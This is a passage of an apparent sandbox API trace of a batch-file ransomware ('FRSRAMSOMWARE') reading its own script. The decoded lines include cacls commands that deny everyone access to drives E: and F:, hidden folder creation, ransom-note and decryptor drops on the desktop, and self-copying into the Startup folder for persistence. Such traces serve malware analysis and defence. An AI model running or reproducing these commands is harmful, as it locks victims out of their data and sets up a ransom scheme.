lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0125.441] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=1269, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x4f5 [0125.441] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=38, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo y|cacls \"E:\\*.*\" /e /d everyone\r\n") returned 38 [0125.441] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x4f5 [0125.441] _get_osfhandle (_FileHandle=3) returned 0x2b8 [0125.441] GetFileType (hFile=0x2b8) returned 0x1 [0125.441] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x4f5 [0125.442] ReadFile (in: hFile=0x2b8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0125.442] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=1307, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x51b [0125.442] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=38, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo y|cacls \"F:\\*.*\" /e /d everyone\r\n") returned 38 [0125.442] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x51b [0125.442] _get_osfhandle (_FileHandle=3) returned 0x2b8 [0125.442] GetFileType (hFile=0x2b8) returned 0x1 [0125.442] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x51b [0125.442] ReadFile (in: hFile=0x2b8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0125.442] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=1315, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x523 [0125.442] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=8, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="goto 3\r\nacls \"F:\\*.*\" /e /d everyone\r\n") returned 8 [0125.442] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x523 [0125.442] _get_osfhandle (_FileHandle=3) returned 0x2b8 [0125.442] GetFileType (hFile=0x2b8) returned 0x1 [0125.442] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x523 [0125.442] ReadFile (in: hFile=0x2b8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0125.442] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=1317, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x525 [0125.442] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=2, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="\r\nto 3\r\n") returned 2 [0125.442] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x525 [0125.442] _get_osfhandle (_FileHandle=3) returned 0x2b8 [0125.442] GetFileType (hFile=0x2b8) returned 0x1 [0125.442] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x525 [0125.442] ReadFile (in: hFile=0x2b8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0125.442] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=1321, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x529 [0125.442] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=4, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr=":3\r\n 3\r\n") returned 4 [0125.442] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x529 [0125.442] _get_osfhandle (_FileHandle=3) returned 0x2b8 [0125.442] GetFileType (hFile=0x2b8) returned 0x1 [0125.442] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x529 [0125.442] ReadFile (in: hFile=0x2b8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0125.442] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=1342, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x53e [0125.443] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=21, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="md C:\\FRSRAMSOMWARE\r\n /e /d everyone\r\n") returned 21 [0125.443] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x53e [0125.443] _get_osfhandle (_FileHandle=3) returned 0x2b8 [0125.443] GetFileType (hFile=0x2b8) returned 0x1 [0125.443] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x53e [0125.443] ReadFile (in: hFile=0x2b8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0125.443] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=1379, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x563 [0125.443] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=37, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="attrib +s +a +h +r C:\\FRSRAMSOMWARE\r\n\n") returned 37 [0125.443] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x563 [0125.443] _get_osfhandle (_FileHandle=3) returned 0x2b8 [0125.443] GetFileType (hFile=0x2b8) returned 0x1 [0125.443] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x563 [0125.443] ReadFile (in: hFile=0x2b8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0125.443] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=1395, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x573 [0125.443] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=16, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="md C:\\FRS_TEMP\r\n+r C:\\FRSRAMSOMWARE\r\n") returned 16 [0125.443] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x573 [0125.443] _get_osfhandle (_FileHandle=3) returned 0x2b8 [0125.443] GetFileType (hFile=0x2b8) returned 0x1 [0125.443] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x573 [0125.443] ReadFile (in: hFile=0x2b8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0125.443] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=1427, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x593 [0125.443] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=32, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="attrib +s +a +h +r C:\\FRS_TEMP\r\nARE\r\n") returned 32 [0125.443] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x593 [0125.443] _get_osfhandle (_FileHandle=3) returned 0x2b8 [0125.443] GetFileType (hFile=0x2b8) returned 0x1 [0125.443] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x593 [0125.443] ReadFile (in: hFile=0x2b8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0125.443] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=1462, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5b6 [0125.443] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=35, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo.encrypt>C:\\FRS_TEMP\\temp.txt\r\n\r\n") returned 35 [0125.444] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x5b6 [0125.444] _get_osfhandle (_FileHandle=3) returned 0x2b8 [0125.444] GetFileType (hFile=0x2b8) returned 0x1 [0125.444] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x5b6 [0125.444] ReadFile (in: hFile=0x2b8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0125.444] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=1542, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x606 [0125.444] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=80, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="copy %MYFILES%\\FRS_Decryptor.exe C:\\Users\\%username%\\Desktop\\FRS_Decryptor.exe\r\npng\r\n") returned 80 [0125.444] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x606 [0125.444] _get_osfhandle (_FileHandle=3) returned 0x2b8 [0125.444] GetFileType (hFile=0x2b8) returned 0x1 [0125.444] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x606 [0125.444] ReadFile (in: hFile=0x2b8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0125.444] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=1626, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x65a [0125.444] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=84, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="copy %MYFILES%\\READ_ME_HELP_ME.png C:\\Users\\%username%\\Desktop\\READ_ME_HELP_ME.png\r\n\n") returned 84 [0125.444] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x65a [0125.444] _get_osfhandle (_FileHandle=3) returned 0x2b8 [0125.444] GetFileType (hFile=0x2b8) returned 0x1 [0125.444] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x65a [0125.444] ReadFile (in: hFile=0x2b8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0125.444] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=1710, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x6ae [0125.444] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=84, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="copy %MYFILES%\\READ_ME_HELP_ME.txt C:\\Users\\%username%\\Desktop\\READ_ME_HELP_ME.txt\r\n") returned 84 [0125.444] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x6ae [0125.444] _get_osfhandle (_FileHandle=3) returned 0x2b8 [0125.444] GetFileType (hFile=0x2b8) returned 0x1 [0125.444] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x6ae [0125.444] ReadFile (in: hFile=0x2b8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0125.444] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=1806, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x70e [0125.444] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=96, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="copy %MYFILES%\\Chinese_national_flag.png C:\\Users\\%username%\\Desktop\\Chinese_national_flag.png\r\n\n") returned 96 [0125.444] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x70e [0125.444] _get_osfhandle (_FileHandle=3) returned 0x2b8 [0125.444] GetFileType (hFile=0x2b8) returned 0x1 [0125.444] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x70e [0125.445] ReadFile (in: hFile=0x2b8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0125.445] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=1840, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x730 [0125.445] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=34, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="copy %0 C:\\FRSRAMSOMWARE\\FRS.exe\r\nag.png C:\\Users\\%username%\\Desktop\\Chinese_national_flag.png\r\n") returned 34 [0125.445] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x730 [0125.445] _get_osfhandle (_FileHandle=3) returned 0x2b8 [0125.445] GetFileType (hFile=0x2b8) returned 0x1 [0125.445] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x730 [0125.445] ReadFile (in: hFile=0x2b8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0125.445] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=1937, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x791 [0125.445] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=97, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="copy %0 \"C:\\Users\\FIFCOM\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\FRS.exe\"\r\n") returned 97 [0125.445] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x791 [0125.445] _get_osfhandle (_FileHandle=3) returned 0x2b8 [0125.445] GetFileType (hFile=0x2b8) returned 0x1 [0125.445] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x791 [0125.445] ReadFile (in: hFile=0x2b8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0125.445] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=2006, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x7d6 [0125.445] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=69, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="copy %MYFILES%\\FRS_Decryptor.exe C:\\FRSRAMSOMWARE\\FRS_Decryptor.exe\r\n\\Programs\\Startup\\FRS.exe\"\r\n") returned 69 [0125.445] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x7d6 [0125.445] _get_osfhandle (_FileHandle=3) returned 0x2b8 [0125.445] GetFileType (hFile=0x2b8) returned 0x1 [0125.445] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x7d6 [0125.445] ReadFile (in: hFile=0x2b8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0125.445] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=2079, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x81f [0125.445] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=73, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="copy %MYFILES%\\READ_ME_HELP_ME.png C:\\FRSRAMSOMWARE\\READ_ME_HELP_ME.png\r\ngrams\\Startup\\FRS.exe\"\r\n") returned 73 [0125.445] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x81f [0125.445] _get_osfhandle (_FileHandle=3) returned 0x2b8 [0125.445] GetFileType (hFile=0x2b8) returned 0x1 [0125.445] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x81f [0125.445] ReadFile (in: hFile=0x2b8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0125.446] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=2152, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x868 [0125.446] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=73, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="copy %MYFILES%\\READ_ME_HELP_ME.txt C:\\FRSRAMSOMWARE\\READ_ME_HELP_ME.txt\r\n") returned 73 [0125.446] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x868 [0125.446] _get_osfhandle (_FileHandle=3) returned 0x2b8 [0125.446] GetFileType (hFile=0x2b8) returned 0x1 [0125.446] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x868 [0125.446] ReadFile (in: hFile=0x2b8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0125.446] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=2237, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x8bd [0125.446] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=85, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="copy %MYFILES%\\Chinese_national_flag.png C:\\FRSRAMSOMWARE\\Chinese_national_flag.png\r\np\\FRS.exe\"\r\n") returned 85 [0125.446] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x8bd [0125.446] _get_osfhandle (_FileHandle=3) returned 0x2b8 [0125.446] GetFileType (hFile=0x2b8) returned 0x1 [0125.446] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x8bd [0125.446] ReadFile (in: hFile=0x2b8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x1b1, lpOverlapped=0x0) returned 1 [0125.446] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=2280, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x8e8 [0125.446] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=43, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="start %MYFILES%\\Chinese_national_flag.png\r\n\\FRSRAMSOMWARE\\Chinese_national_flag.png\r\n") returned 43 [0125.446] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x8e8 [0125.446] _get_osfhandle (_FileHandle=3) returned 0x2b8 [0125.446] GetFileType (hFile=0x2b8) returned 0x1 [0125.446] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x8e8 [0125.446] ReadFile (in: hFile=0x2b8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x186, lpOverlapped=0x0) returned 1 [0125.446] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=2302, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x8fe [0125.446] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=22, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ping -n 10 127.1>nul\r\ne_national_flag.png\r\n") returned 22 [0125.446] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x8fe [0125.446] _get_osfhandle (_FileHandle=3) returned 0x2b8 [0125.446] GetFileType (hFile=0x2b8) returned 0x1 [0125.446] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x8fe [0125.446] ReadFile (in: hFile=0x2b8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x170, lpOverlapped=0x0) returned 1 [0125.446] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=2339, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x923 [0125.447] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=37, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="start %MYFILES%\\READ_ME_HELP_ME.txt\r\n.png\r\n") returned 37 [0125.447] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x923 [0125.447] _get_osfhandle (_FileHandle=3) returned 0x2b8 [0125.447] GetFileType (hFile=0x2b8) returned 0x1 [0125.447] SetFilePointer (in: hFile=0x2b8, 